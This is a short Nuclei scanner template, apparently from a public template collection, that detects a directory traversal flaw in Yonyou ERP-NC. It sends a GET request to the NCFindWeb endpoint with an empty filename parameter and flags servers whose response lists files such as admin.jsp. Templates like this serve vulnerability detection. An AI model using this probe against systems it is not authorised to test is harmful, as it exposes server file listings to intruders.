id: erp-nc-directory-traversal

info:
  name: ERP-NC directory traversal
  author: pikpikcu
  severity: high
  reference: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
  tags: lfi,erp-nc

requests:
  - method: GET
    path:
      - "{{BaseURL}}/NCFindWeb?service=IPreAlertConfigService&filename="

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Client"
          - "ncwslogin.jsp"
          - "admin.jsp"
        part: body
        condition: and

      - type: status
        status:
          - 200
